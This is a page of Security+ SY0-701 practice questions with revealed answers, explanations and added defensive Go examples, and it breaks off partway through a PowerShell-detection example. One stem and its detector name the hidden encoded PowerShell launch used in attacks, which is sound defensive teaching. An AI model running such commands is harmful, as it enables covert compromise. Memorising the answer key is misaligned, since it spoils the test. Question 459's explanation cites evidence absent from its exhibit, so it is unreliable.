Security+ (SY0-701) — Questions 451-525

1152 questions total · 16 pages · All types, answers revealed


Page 7 of 16

451
Multi-Select · medium

An online retailer is redesigning a network for a public web app. Customers must reach only the web tier from the internet. The web tier must reach the application tier, and the application tier must reach the database tier. Which two design changes best support this zoning model? Select two.

Select 2 answers
A. Place all three server tiers on the same flat VLAN and rely on host firewalls.
B. Put the internet-facing web tier in a DMZ with tightly filtered inbound rules.
C. Give the database server a public IP address so the web tier can connect faster.
D. Place the application and database tiers in separate internal zones with firewall allow-lists between them.
E. Use a single NAT device for all servers and disable interserver filtering.
Answers: B, D

A DMZ exposes only the web tier to the internet while keeping internal systems off the public network.

Why this answer

Option B is correct because placing the internet-facing web tier in a DMZ (demilitarized zone) with tightly filtered inbound rules ensures that external users can only reach the web servers, while the DMZ network isolates them from internal tiers. This aligns with the principle of defense in depth, where the DMZ acts as a buffer zone, and inbound rules (e.g., allowing only TCP/443 for HTTPS) minimize the attack surface. The web tier can then initiate outbound connections to the application tier through a firewall with specific allow-lists, maintaining strict segmentation.

Exam trap

The trap here is that candidates often confuse a flat VLAN with host firewalls as sufficient segmentation, not realizing that host firewalls can be disabled or bypassed once an attacker gains local access, whereas network-layer segmentation (e.g., DMZ and separate internal zones) provides a more robust security boundary that is harder to circumvent.

452
MCQ · easy

A help desk team needs to update desktops in a call center without interrupting callers during peak hours. What is the best operational approach?

A. Deploy the updates immediately to all desktops at once
B. Schedule the updates during an approved maintenance window
C. Ask each user to install updates whenever they have time
D. Disable update notifications permanently
Answer: B

A maintenance window reduces user impact and gives the team predictable time to monitor the changes.

Why this answer

Scheduling updates during an approved maintenance window ensures that desktops are updated during a period of low activity, minimizing disruption to call center operations. This approach aligns with change management best practices, allowing for controlled deployment and rollback if issues arise, and avoids the performance degradation or reboots that could interrupt active calls.

Exam trap

The trap here is that candidates may choose immediate deployment (A) thinking it is the most efficient for security, overlooking the operational requirement to maintain service availability during peak hours.

How to eliminate wrong answers

Option A is wrong because deploying updates immediately to all desktops at once risks simultaneous reboots or performance slowdowns during peak hours, which would directly interrupt callers and violate availability requirements. Option C is wrong because asking each user to install updates whenever they have time lacks coordination and control; users may forget, delay, or apply updates inconsistently, leading to security gaps and unpredictable system behavior. Option D is wrong because disabling update notifications permanently hides the problem rather than solving it: the desktops stay unpatched, and the team loses visibility into which systems still need the update.

453
MCQ · hard

Based on the exhibit, what is the best governance improvement?

Data handling procedure:
- Managers may approve external sharing exceptions verbally.
- Staff record exceptions in email threads.
- No retention period is defined for exception evidence.
Audit note: multiple exceptions could not be traced to an approver.

A. Replace verbal and email exceptions with a documented approval workflow and retained exception records.
B. Allow each team to decide its own exception format to increase flexibility.
C. Remove exception handling entirely so no external sharing can ever occur.
D. Keep the procedure unchanged and rely on additional awareness training alone.
Answer: A

A formal workflow creates traceable approvals, preserves evidence, and makes exception handling auditable later.

Why this answer

Option A is correct because the current procedure lacks a documented approval workflow and a retention policy, which is exactly why the auditors could not trace exceptions to an approver. A formal, auditable process gives each exception a named approver, a timestamp, and retained evidence, so an approval cannot later be disputed and the procedure satisfies data handling governance. It fixes the root cause instead of layering more informal verbal or email-based approvals on top of it.

Exam trap

The trap here is that candidates may think training alone (Option D) can fix a procedural gap, but the SY0-701 exam emphasizes that governance improvements require enforceable controls, not just awareness, to ensure accountability and auditability.

How to eliminate wrong answers

Option B is wrong because allowing each team to decide its own exception format would increase inconsistency and make auditing even more difficult, violating the principle of standardized governance. Option C is wrong because removing exception handling entirely is an extreme, impractical measure that would disrupt legitimate business needs for external sharing, and it does not address the governance gap in a balanced way. Option D is wrong because additional awareness training alone cannot fix the lack of a documented, auditable workflow; without a formal process, staff will continue using informal methods that fail to provide traceability.

454
Matching · easy

Match each access principle to the best description.


Concept: description

Least privilege: Give the user only the permissions needed to do the job.

Need-to-know: Share only the information required for the assigned task.

Separation of duties: Split important steps so one person cannot complete everything alone.

Zero trust: Verify each request instead of trusting a user just because they are internal.

Defense in depth: Use multiple protective layers so one failure does not expose everything.

Why these pairings

Least privilege grants minimal permissions, need-to-know restricts which information is shared, separation of duties splits critical tasks, zero trust verifies every request regardless of where it comes from, and defense in depth uses multiple security layers so that one failure does not expose everything.

455
MCQ · medium

A branch office needs to send a confidential design document to headquarters over an untrusted network. Headquarters already has the public/private key pair available for document exchange. Which method is most appropriate to keep the file confidential during transit without first sharing a secret key?

A. Encrypt the file with headquarters' public key
B. Publish a hash of the file for comparison
C. Sign the file with the branch office private key only
D. Compress the file before sending it
Answer: A

Only headquarters can decrypt the file with its matching private key, preserving confidentiality in transit.

Why this answer

Encrypting the file with headquarters' public key ensures that only headquarters, which holds the corresponding private key, can decrypt and read the file. This provides confidentiality over an untrusted network without a pre-shared secret, because the public key can be distributed freely. Two practical details matter: the branch office must be sure the public key really belongs to headquarters (taken from a certificate or verified out of band), since encrypting to an attacker-substituted key hands confidentiality to the attacker; and for a file of any size the document is encrypted with a fresh symmetric key that is itself encrypted with the public key (hybrid encryption), rather than feeding the whole file through RSA.

Exam trap

The trap here is that candidates confuse digital signatures (which provide authentication and integrity) with encryption (which provides confidentiality), leading them to choose signing the file instead of encrypting it.

How to eliminate wrong answers

Option B is wrong because publishing a hash of the file allows integrity verification but does not provide confidentiality; the file itself remains readable in transit. Option C is wrong because signing with the branch office's private key provides authentication and non-repudiation, not confidentiality; the file is still sent in plaintext. Option D is wrong because compression reduces file size but does not provide any cryptographic protection; the compressed data can still be read by anyone intercepting it.
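Worked example (added here; not part of the original question set): the branch-to-headquarters exchange in Go using only the standard library. The document is encrypted under a fresh AES-256-GCM key and that key is wrapped with headquarters' RSA public key, which is how public-key encryption is applied to a file in practice; the same program also builds the option C message (document plus signature) to show that it leaves the plaintext readable. Key pairs are generated on the fly and the document text is a constructed sample; nothing here comes from a real exchange.

```go
package main

import (
	"bytes"
	"crypto"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// Envelope is what the branch office sends. The document is encrypted under a fresh
// AES-256-GCM key and only that key is wrapped with headquarters' RSA public key
// (RSA-OAEP); a document larger than one RSA block is always handled this way.
type Envelope struct {
	WrappedKey, Nonce, Ciphertext []byte
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// EncryptForRecipient needs only the recipient's public key: nothing secret is shared first.
func EncryptForRecipient(pub *rsa.PublicKey, doc []byte) (*Envelope, error) {
	dek := make([]byte, 32)
	if _, err := rand.Read(dek); err != nil {
		return nil, err
	}
	gcm, err := newGCM(dek)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, dek, nil)
	if err != nil {
		return nil, err
	}
	return &Envelope{wrapped, nonce, gcm.Seal(nil, nonce, doc, nil)}, nil
}

// DecryptWithPrivateKey is the headquarters side; any other private key fails at the unwrap.
func DecryptWithPrivateKey(priv *rsa.PrivateKey, env *Envelope) ([]byte, error) {
	dek, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, env.WrappedKey, nil)
	if err != nil {
		return nil, err
	}
	gcm, err := newGCM(dek)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, env.Nonce, env.Ciphertext, nil)
}

// SignOnly is option C: proves origin and integrity, but the document travels in the clear.
func SignOnly(priv *rsa.PrivateKey, doc []byte) ([]byte, error) {
	digest := sha256.Sum256(doc)
	return rsa.SignPSS(rand.Reader, priv, crypto.SHA256, digest[:], nil)
}

// Leaks reports whether the plaintext document is readable in what goes on the wire.
func Leaks(wire, doc []byte) bool { return bytes.Contains(wire, doc) }

// Demo runs the exchange with freshly generated keys and a constructed document and
// returns: envelope leaks plaintext?, HQ recovers it?, the branch's own key recovers it?,
// signed-only message leaks plaintext?
func Demo() (envLeaks, hqRecovers, wrongKeyWorks, signedLeaks bool, err error) {
	hq, err := rsa.GenerateKey(rand.Reader, 2048) // headquarters' existing key pair
	if err != nil {
		return
	}
	branch, err := rsa.GenerateKey(rand.Reader, 2048) // the branch office's own key pair
	if err != nil {
		return
	}
	doc := []byte("CONFIDENTIAL design document, revision 3 (constructed sample)")
	env, err := EncryptForRecipient(&hq.PublicKey, doc)
	if err != nil {
		return
	}
	pt, err := DecryptWithPrivateKey(hq, env)
	if err != nil {
		return
	}
	_, wrongErr := DecryptWithPrivateKey(branch, env)
	sig, err := SignOnly(branch, doc)
	if err != nil {
		return
	}
	wire := append(append([]byte{}, doc...), sig...) // what option C actually transmits
	return Leaks(env.Ciphertext, doc), bytes.Equal(pt, doc), wrongErr == nil, Leaks(wire, doc), nil
}

func main() {
	envLeaks, hqRecovers, wrongKeyWorks, signedLeaks, err := Demo()
	if err != nil {
		panic(err)
	}
	fmt.Println("envelope leaks plaintext:", envLeaks)
	fmt.Println("HQ recovers document:", hqRecovers)
	fmt.Println("branch key recovers document:", wrongKeyWorks)
	fmt.Println("signed-only message leaks plaintext:", signedLeaks)
}
```

In a real deployment the public key would come from a certificate or an out-of-band verified fingerprint, and the envelope would be produced by an established tool (age, GPG, S/MIME) rather than hand-rolled code; the point of the example is to see where the private key is required and where it is not.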

456
Multi-Select · medium

HR needs to share a copy of employee records with a benefits contractor for testing. The contractor only needs names and coverage selections, not Social Security numbers or bank details. Which two actions best satisfy data handling requirements? Select two.

Select 2 answers
A. Redact or mask unnecessary sensitive fields before sharing the file.
B. Send the full employee record set because the contractor is trusted.
C. Restrict access to the file to approved HR and project staff only.
D. Upload the file to a public collaboration site so the contractor can retrieve it easily.
E. Keep an unrestricted copy on multiple shared drives for convenience.
Answers: A, C

Data minimization is a core handling requirement. Removing SSNs, bank data, and other unnecessary fields reduces privacy risk and limits exposure if the test data is mishandled.

Why this answer

Option A is correct because redacting or masking the Social Security numbers and bank details leaves the contractor with only what the test requires (names and coverage selections) while the rest of the PII never leaves HR. This is data minimization, and it is what regulations such as GDPR and HIPAA's minimum-necessary standard expect when data is shared for a defined purpose. Masking limits what is exposed if the file is mishandled; it does not protect the fields that remain, which is why access restriction (option C) is still needed. One caveat a practitioner should know: replacing SSNs with an unsalted hash is not a safe mask, because there are only about a billion possible SSNs and the hashes can be reversed by brute force. Prefer outright removal, a fixed placeholder, a keyed hash or tokenization whose key stays with HR, or synthetic test records.

Exam trap

The trap here is that candidates may assume trust (option B) or convenience (option D or E) justifies sharing full data, but the exam emphasizes that data handling requirements always mandate minimizing exposure and enforcing access controls regardless of trust level.

457
Multi-Select · medium

A business unit asks for a 30-day exception to use an unsupported browser plug-in on two engineering workstations while a replacement is tested. Which three conditions should be required before approval? Select three.

Select 3 answers
A. A documented business justification for why the plug-in is still needed.
B. A defined expiration date and review point before the exception can be extended.
C. A compensating control such as isolating the workstations from the general user network.
D. An open-ended waiver so the team can continue if testing slips.
E. Verbal approval only, with no written record.
Answers: A, B, C

A justified business need shows the exception supports a real operational requirement, not convenience.

Why this answer

Option A is correct because a documented business justification ensures that the exception is necessary and aligns with organizational risk appetite. Without a clear reason, the exception could be granted for convenience rather than critical need, undermining security governance. This justification also provides an audit trail for why an unsupported, potentially vulnerable plug-in is still in use.

Exam trap

The trap here is that candidates might think only one or two conditions are sufficient, but CompTIA expects all three—justification, expiration, and compensating controls—to be required for a valid exception approval.

458
MCQ · easy

A Linux server starts showing many failed SSH logins from one source IP address. Which log source should the analyst review first?

A. The system authentication log
B. The printer spooler log
C. The browser history log
D. The backup completion log
Answer: A

This is the best choice because authentication logs record login attempts, failures, and success events. For SSH activity, the auth log or equivalent security log is the most direct place to confirm whether the attempts are real, what accounts were targeted, and whether any successful logon followed the failures. It provides the most useful first evidence for triage.

Why this answer

The system authentication log (/var/log/auth.log on Debian-family systems, /var/log/secure on RHEL-family systems) records every SSH login attempt, including failures, together with the source IP address and the account name. It is the primary log source for investigating authentication failures on Linux because it captures both the PAM (Pluggable Authentication Module) events and the SSH daemon's own messages. On hosts where no syslog daemon writes those files, the same sshd and PAM messages live only in the systemd journal (journalctl -u ssh or -u sshd).

Exam trap

The trap here is that candidates might confuse system authentication logs with generic system logs (e.g., /var/log/messages) or assume that SSH failures would be recorded in a network-level log, but the exam specifically tests knowledge of Linux authentication logging mechanisms.

How to eliminate wrong answers

Option B is wrong because the printer spooler log (e.g., /var/log/cups/) tracks print jobs and printer errors, not network authentication events like SSH logins. Option C is wrong because browser history logs are client-side records of web browsing activity, unrelated to server-side SSH authentication attempts. Option D is wrong because the backup completion log (e.g., /var/log/backup.log) records backup job statuses, not real-time authentication failures from remote IP addresses.
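To show what "review the authentication log first" looks like in practice, here is an added Go example (not from the original page) that triages constructed /var/log/auth.log lines. It groups sshd outcomes by source address, counts failures, lists the accounts tried, and, most importantly, flags a successful login that follows the failures from the same source. Hostnames, addresses (documentation ranges) and timestamps are all made up.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// SampleAuthLog is a constructed excerpt in the /var/log/auth.log (Debian) format;
// /var/log/secure on RHEL-family hosts carries the same sshd lines. 203.0.113.0/24 and
// 198.51.100.0/24 are documentation ranges.
var SampleAuthLog = []string{
	"Mar  3 10:15:01 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.45 port 51022 ssh2",
	"Mar  3 10:15:03 web01 sshd[2213]: Failed password for root from 203.0.113.45 port 51030 ssh2",
	"Mar  3 10:15:05 web01 sshd[2215]: Failed password for root from 203.0.113.45 port 51038 ssh2",
	"Mar  3 10:15:07 web01 sshd[2217]: Failed password for deploy from 203.0.113.45 port 51044 ssh2",
	"Mar  3 10:15:09 web01 sshd[2219]: Accepted password for deploy from 203.0.113.45 port 51050 ssh2",
	"Mar  3 10:16:00 web01 sshd[2230]: Accepted publickey for alice from 198.51.100.7 port 40010 ssh2",
	"Mar  3 10:16:30 web01 CRON[2240]: pam_unix(cron:session): session opened for user root by (uid=0)",
}

// sshAuthRe matches sshd's password and public-key outcome lines; "invalid user" marks
// an account that does not exist, which is itself a sign of guessing.
var sshAuthRe = regexp.MustCompile(
	`^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) (?:password|publickey) for (?:invalid user )?(\S+) from (\S+) port \d+`)

// SourceSummary is the per-source view an analyst wants first: how many failures, which
// accounts were tried, and whether a login succeeded after the failures began.
type SourceSummary struct {
	Source, FirstSeen, LastSeen string
	Failures                    int
	Accounts                    []string // sorted
	SuccessAfterFailure         string   // account that got in after failures; "" if none
}

// Triage keeps a source if it reached minFailures or if any success followed a failure;
// the second condition is reported even below the threshold because it is the one that matters.
func Triage(lines []string, minFailures int) []SourceSummary {
	type acc struct {
		sum   SourceSummary
		users map[string]bool
	}
	bySrc := map[string]*acc{}
	for _, line := range lines {
		m := sshAuthRe.FindStringSubmatch(line)
		if m == nil {
			continue // cron, sudo and other PAM lines are not SSH logon outcomes
		}
		ts, outcome, user, src := m[1], m[2], m[3], m[4]
		a := bySrc[src]
		if a == nil {
			a = &acc{sum: SourceSummary{Source: src, FirstSeen: ts}, users: map[string]bool{}}
			bySrc[src] = a
		}
		a.sum.LastSeen = ts
		a.users[user] = true
		if outcome == "Failed" {
			a.sum.Failures++
		} else if a.sum.Failures > 0 && a.sum.SuccessAfterFailure == "" {
			a.sum.SuccessAfterFailure = user
		}
	}
	var out []SourceSummary
	for _, a := range bySrc {
		if a.sum.Failures < minFailures && a.sum.SuccessAfterFailure == "" {
			continue
		}
		for u := range a.users {
			a.sum.Accounts = append(a.sum.Accounts, u)
		}
		sort.Strings(a.sum.Accounts)
		out = append(out, a.sum)
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Failures > out[j].Failures })
	return out
}

func main() {
	for _, s := range Triage(SampleAuthLog, 3) {
		fmt.Printf("%s: %d failures %s..%s, accounts tried: %s\n",
			s.Source, s.Failures, s.FirstSeen, s.LastSeen, strings.Join(s.Accounts, ", "))
		if s.SuccessAfterFailure != "" {
			fmt.Printf("  !! successful logon as %q after failures: check what that session did\n", s.SuccessAfterFailure)
		}
	}
}
```

Feed it the output of grep sshd /var/log/auth.log or journalctl -u ssh -o short; the regex covers the password and publickey outcome lines, and the output puts the noisiest source first. A success after failures is reported regardless of the threshold because that is the event that turns a brute-force attempt into an intrusion.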

459
MCQ · hard

Based on the exhibit, what is the MOST likely activity taking place on the network?

A user opened a spreadsheet shortly before unusual internal connection patterns began. The same account is now authenticating to many hosts in rapid succession.

A. A worm is flooding the network with broadcast traffic and exhausting bandwidth.
B. An attacker is performing lateral movement using stolen credentials and remote administration tools.
C. A malicious insider is exfiltrating data through a cloud sync application.
D. A misconfigured printer is repeatedly scanning the subnet for available services.
Answer: B

The mix of SMB, WinRM, remote logons, Kerberos activity, and PsExec service creation is consistent with movement from one compromised workstation to multiple internal hosts.

Why this answer

The exhibit shows a user opening a spreadsheet (likely a phishing vector) followed by rapid authentication attempts from the same account to many hosts. This pattern matches lateral movement using stolen credentials, where an attacker uses remote administration tools like PsExec, WinRM, or RDP to move across the network after initial compromise.

Exam trap

The trap here is confusing lateral movement with network scanning or data exfiltration; candidates often overlook that the same account authenticating to many hosts is a hallmark of credential-based lateral movement, not a misconfiguration or worm.

How to eliminate wrong answers

Option A is wrong because a worm flooding broadcast traffic would generate excessive broadcast packets (e.g., ARP or ICMP floods), not sequential authentication events to specific hosts. Option C is wrong because data exfiltration via cloud sync would show outbound traffic to cloud storage APIs, not internal authentication bursts. Option D is wrong because a misconfigured printer scanning the subnet would use protocols like SNMP or mDNS discovery, not repeated authentication attempts with the same user account.
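Added Go example (not part of the original page) of the detection logic behind this answer: given normalized Windows logon events, flag an account that authenticates to many distinct hosts over network or RDP logon types within a short window. The events are constructed to mirror the scenario: one console logon on the workstation where the spreadsheet was opened, then the same account reaching five servers within a minute; host and account names are invented.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
	"time"
)

// LogonEvent is the subset of a Windows Security event 4624 a SIEM normalizes: the host
// that recorded the logon (the target), the account, the logon type and where it came from.
type LogonEvent struct {
	Time      time.Time
	Target    string
	Account   string
	LogonType int    // 2 = console, 3 = network (SMB, WinRM, PsExec), 10 = RDP
	Source    string // workstation name or address the logon originated from
}

type Alert struct {
	Account, Source        string
	Targets                []string // distinct hosts reached, sorted
	WindowStart, WindowEnd time.Time
}

const DefaultWindow = 5 * time.Minute

var t0 = time.Date(2024, 3, 3, 14, 2, 0, 0, time.UTC)

// SampleLogons is constructed: j.doe opens the spreadsheet at the console of WS-0421, then
// the same account reaches five servers from that workstation within about a minute.
var SampleLogons = []LogonEvent{
	{t0, "WS-0421", `CORP\j.doe`, 2, "WS-0421"},
	{t0.Add(90 * time.Second), "FS01", `CORP\j.doe`, 3, "WS-0421"},
	{t0.Add(100 * time.Second), "FS02", `CORP\j.doe`, 3, "WS-0421"},
	{t0.Add(110 * time.Second), "HR-DB01", `CORP\j.doe`, 3, "WS-0421"},
	{t0.Add(125 * time.Second), "PRINT01", `CORP\j.doe`, 3, "WS-0421"},
	{t0.Add(140 * time.Second), "DC02", `CORP\j.doe`, 10, "WS-0421"},
	{t0.Add(30 * time.Minute), "FS01", `CORP\a.lee`, 3, "WS-0187"}, // one share, one host: normal
}

// DetectFanOut flags an account that authenticates to at least minHosts distinct hosts over
// remote logon types within any window of the given length. Console logons are ignored:
// the signal is one identity touching many machines, not the user sitting at one of them.
func DetectFanOut(events []LogonEvent, window time.Duration, minHosts int) []Alert {
	byAccount := map[string][]LogonEvent{}
	for _, e := range events {
		if e.LogonType == 3 || e.LogonType == 10 {
			byAccount[e.Account] = append(byAccount[e.Account], e)
		}
	}
	var alerts []Alert
	for acct, evs := range byAccount {
		sort.Slice(evs, func(i, j int) bool { return evs[i].Time.Before(evs[j].Time) })
		for i := range evs { // slide a window starting at each event
			seen := map[string]bool{}
			j := i
			for j < len(evs) && evs[j].Time.Sub(evs[i].Time) <= window {
				seen[evs[j].Target] = true
				j++
			}
			if len(seen) < minHosts {
				continue
			}
			a := Alert{Account: acct, Source: evs[i].Source, WindowStart: evs[i].Time, WindowEnd: evs[j-1].Time}
			for h := range seen {
				a.Targets = append(a.Targets, h)
			}
			sort.Strings(a.Targets)
			alerts = append(alerts, a)
			break // one alert per account is enough to start triage
		}
	}
	sort.Slice(alerts, func(i, j int) bool { return alerts[i].Account < alerts[j].Account })
	return alerts
}

func main() {
	for _, a := range DetectFanOut(SampleLogons, DefaultWindow, 4) {
		fmt.Printf("%s from %s reached %d hosts in %s: %s\n", a.Account, a.Source, len(a.Targets),
			a.WindowEnd.Sub(a.WindowStart), strings.Join(a.Targets, ", "))
	}
}
```

Service accounts, backup agents and vulnerability scanners legitimately fan out like this, so in production the rule needs an allow-list for those identities; pair the alert with 4688 or Sysmon process-creation events on the source workstation to find the PsExec or WinRM client that drove it.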

460
Multi-Select · hard

A responder has imaged a suspect laptop and needs to preserve the evidence for possible legal action. Which three actions best support chain of custody and admissibility? Select three.

Select 3 answers
A. Document the evidence identifier, collector, date, time, and location on the chain-of-custody form.
B. Calculate and record cryptographic hashes for the original evidence and the forensic image.
C. Place the original device in a sealed, access-controlled evidence locker after collection.
D. Mount the original drive read/write so investigators can search it faster.
E. Rename the image file to match the case number before hashing it.
Answers: A, B, C

Complete documentation shows who handled the evidence and when, which helps establish a defensible custody history.

Why this answer

Option A is correct because documenting the evidence identifier, collector, date, time, and location on the chain-of-custody form establishes a clear, auditable record of who handled the evidence and when. This documentation is essential for proving the evidence has not been tampered with and is admissible in court. Without this detailed logging, the chain of custody is broken, and the evidence may be challenged.

Exam trap

The trap here is option E. Renaming a file does not change a cryptographic hash of its contents, so the problem is not a "broken hash"; the problem is that the evidence was handled before its integrity baseline existed. The hash must be taken at acquisition, before anything else is done with the original or the image, and the acquisition record must name the file as it was when hashed. Any later rename or move is a custody event to be logged, not a step to take before hashing.
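Added Go example (not from the original page) of the hashing and verification step the chain-of-custody record depends on. It writes a constructed stand-in for the image to a temporary directory, records collector, time, filename and SHA-256 at acquisition, then shows three things: the record verifies; renaming the file (option E, done after hashing here) leaves the content hash unchanged but breaks the link between the record and the filename; and changing a single byte is detected. Evidence IDs, names and the image bytes are all invented.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"time"
)

// CustodyRecord is the minimum one line of the chain-of-custody form must carry:
// who collected what, when and where, plus the hash that pins the item's content.
type CustodyRecord struct {
	EvidenceID, Collector, Location string
	Collected                       time.Time
	FileName                        string // exactly as it existed when the hash was taken
	SHA256                          string
}

func HashFile(path string) (string, error) {
	f, err := os.Open(path)
	if err != nil {
		return "", err
	}
	defer f.Close()
	h := sha256.New()
	if _, err := io.Copy(h, f); err != nil {
		return "", err
	}
	return hex.EncodeToString(h.Sum(nil)), nil
}

// Acquire hashes the item at collection time, before anything else is done with it.
func Acquire(id, collector, location, path string) (CustodyRecord, error) {
	sum, err := HashFile(path)
	if err != nil {
		return CustodyRecord{}, err
	}
	return CustodyRecord{EvidenceID: id, Collector: collector, Location: location,
		Collected: time.Now().UTC(), FileName: filepath.Base(path), SHA256: sum}, nil
}

// Verify recomputes the hash and checks that the file still matches what the record names.
func Verify(rec CustodyRecord, path string) (hashMatches, nameMatches bool, err error) {
	sum, err := HashFile(path)
	if err != nil {
		return false, false, err
	}
	return sum == rec.SHA256, filepath.Base(path) == rec.FileName, nil
}

type DemoResult struct {
	VerifiesAtAcquisition bool // recomputed hash equals the recorded one
	HashSurvivesRename    bool // the content hash does not depend on the file name
	NameStillMatches      bool // but the record now names a file that no longer exists
	TamperDetected        bool // a single changed byte changes the hash
}

const imageBytes = "constructed forensic image contents" // stands in for a real image

// Demo runs the sequence on the constructed image in a temporary directory.
func Demo() (DemoResult, error) {
	var r DemoResult
	dir, err := os.MkdirTemp("", "evidence")
	if err != nil {
		return r, err
	}
	defer os.RemoveAll(dir)
	img := filepath.Join(dir, "laptop-sda.img")
	if err := os.WriteFile(img, []byte(imageBytes), 0o600); err != nil {
		return r, err
	}
	rec, err := Acquire("EV-0031", "R. Patel", "forensics bench 2", img)
	if err != nil {
		return r, err
	}
	r.VerifiesAtAcquisition, _, err = Verify(rec, img)
	if err != nil {
		return r, err
	}
	renamed := filepath.Join(dir, "CASE-4471.img") // option E's rename, done after hashing
	if err := os.Rename(img, renamed); err != nil {
		return r, err
	}
	r.HashSurvivesRename, r.NameStillMatches, err = Verify(rec, renamed)
	if err != nil {
		return r, err
	}
	tampered := imageBytes[:len(imageBytes)-1] + "S" // one byte of "evidence" changes
	if err := os.WriteFile(renamed, []byte(tampered), 0o600); err != nil {
		return r, err
	}
	ok, _, err := Verify(rec, renamed)
	r.TamperDetected = err == nil && !ok
	return r, err
}

func main() {
	fmt.Println(Demo())
}
```

Real imaging tools record MD5 and SHA-256 in their acquisition log; keep those and the verification output with the custody form. Verify against a write-blocked original or a second copy, never by mounting the original read/write (option D).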

461
MCQ · easy

Employees sign in once to the company portal and then can access email, the ticketing system, and the HR site without logging in again. What is this called?

A. Single sign-on
B. Port forwarding
C. Tokenization
D. Network address translation
Answer: A

SSO lets a user authenticate once and access multiple integrated services without repeated logins.

Why this answer

Single sign-on (SSO) allows a user to authenticate once and gain access to multiple applications or systems without re-entering credentials. In this scenario, the company portal acts as the identity provider (IdP), and after initial authentication, it issues a token (e.g., SAML assertion or Kerberos ticket) that is accepted by the email, ticketing, and HR systems as proof of identity. This eliminates the need for repeated logins across these services.

Exam trap

The trap here is that candidates confuse single sign-on with tokenization, because both involve 'tokens,' but tokenization is a data protection method for sensitive data, not an authentication mechanism for accessing multiple applications.

How to eliminate wrong answers

Option B is wrong because port forwarding is a network address translation (NAT) technique that redirects traffic from one IP address and port to another, typically used to expose internal services to the internet, not to manage authentication across multiple applications. Option C is wrong because tokenization replaces sensitive data (like credit card numbers) with a non-sensitive placeholder (token) for security, but it does not provide a mechanism for authenticating a user once and accessing multiple systems. Option D is wrong because network address translation (NAT) modifies IP address information in packet headers to map private addresses to public ones, and has no role in authentication or session management across applications.

462
MCQ · medium

Network engineers need to manage switches in a data center from home. The solution must encrypt management traffic, strongly authenticate users, and avoid exposing management ports directly to the internet. Which approach is best?

A. Telnet to the switches over a router port-forward rule.
B. SSH directly to the switches from the internet using password-only authentication.
C. Use SNMPv2c with restricted source IP addresses.
D. Connect through a VPN to a bastion host, then use SSH to the switches.
Answer: D

A VPN hides management interfaces from the public internet, and a bastion host provides a controlled jump point for secure administration.

Why this answer

Option D is correct because it combines a VPN (which encrypts the path from home and, when it is terminated with certificate- or MFA-based authentication, provides strong authentication) with a bastion host (a hardened jump server) so that the switch management interfaces are never exposed directly to the internet. SSH from the bastion then gives encrypted, authenticated access to the switches, meeting all three requirements: encryption, strong authentication, and no direct internet exposure. The switches should accept SSH only from the bastion's address, and the bastion itself should require keys or MFA rather than passwords.

Exam trap

The trap here is that candidates often think SSH alone (Option B) is sufficient because it encrypts traffic, but they overlook the requirement to avoid exposing management ports directly to the internet, which is a critical security design principle tested in SY0-701.

How to eliminate wrong answers

Option A is wrong because Telnet transmits all data, including passwords, in cleartext (no encryption) and port-forwarding exposes the switch management port directly to the internet, violating the requirement to avoid direct exposure. Option B is wrong because SSH does provide encryption, but allowing direct SSH from the internet exposes the switch management port and password-only authentication is not considered strong authentication (lacks multi-factor or key-based methods). Option C is wrong because SNMPv2c uses community strings in cleartext (no encryption) and provides only weak authentication; restricting source IPs does not encrypt traffic or provide strong user authentication.

463
Multi-Select · hard

An endpoint investigation shows winword.exe launching powershell.exe with -nop -w hidden -enc arguments. The same host also has a newly created WMI permanent event subscription, and no new executable has appeared in Downloads or Program Files. Which two findings are most consistent with a fileless compromise and persistence mechanism? Select two.

Select 2 answers
A. PowerShell was launched with encoded, hidden execution arguments from a document process.
B. A WMI permanent event subscription was created under the root\subscription namespace.
C. A new executable named updater.exe was copied into Program Files by an administrator.
D. The browser cache was cleared after a routine user sign-out.
E. A signed video driver updated successfully through Windows Update.
Answers: A, B

Encoded and hidden PowerShell launched from a document process is a strong fileless malware indicator. The attack uses built-in scripting rather than dropping a traditional executable, which helps evade file-based detections. In combination with a user-facing process like Word, this pattern commonly suggests initial execution through malicious content or macro abuse.

Why this answer

Option A is correct because the use of winword.exe to launch powershell.exe with `-nop -w hidden -enc` arguments is a classic fileless execution technique. The encoded command runs entirely in memory without writing a payload to disk, and the launch from a document process (winword.exe) indicates a macro or exploit-based initial access, consistent with a fileless compromise.

Exam trap

The trap here is that candidates may think any persistence mechanism (like a new executable in Program Files) is fileless, but fileless specifically means no executable written to disk, and WMI subscriptions are a common fileless persistence vector.
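Added Go example (not part of the original page) for finding A: given process-creation events of the kind Sysmon Event ID 1 or Security 4688 produce, it fires only when an Office application spawns PowerShell, records the -nop and -w hidden flags, and decodes the -enc payload (base64 over UTF-16LE) so the analyst sees the script rather than the blob. The sample events and the script they carry are constructed; the address in the script is from a documentation range.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
	"unicode/utf16"
)

// ProcessEvent is the subset of a Sysmon Event ID 1 (or Security 4688) record needed here.
type ProcessEvent struct {
	Host, ParentImage, Image, CommandLine string
}

type Finding struct {
	Host, Parent, Child string
	NoProfile, Hidden   bool
	Decoded             string // what PowerShell will actually run, if -EncodedCommand was used
}

var officeApps = map[string]bool{"winword.exe": true, "excel.exe": true, "powerpnt.exe": true, "outlook.exe": true}
var shells = map[string]bool{"powershell.exe": true, "pwsh.exe": true}

func baseName(p string) string {
	if i := strings.LastIndexAny(p, `\/`); i >= 0 {
		p = p[i+1:]
	}
	return strings.ToLower(strings.Trim(p, `"`))
}

// isEncodedFlag accepts -EncodedCommand and the shortened forms PowerShell accepts (-e, -ec, -enc, ...).
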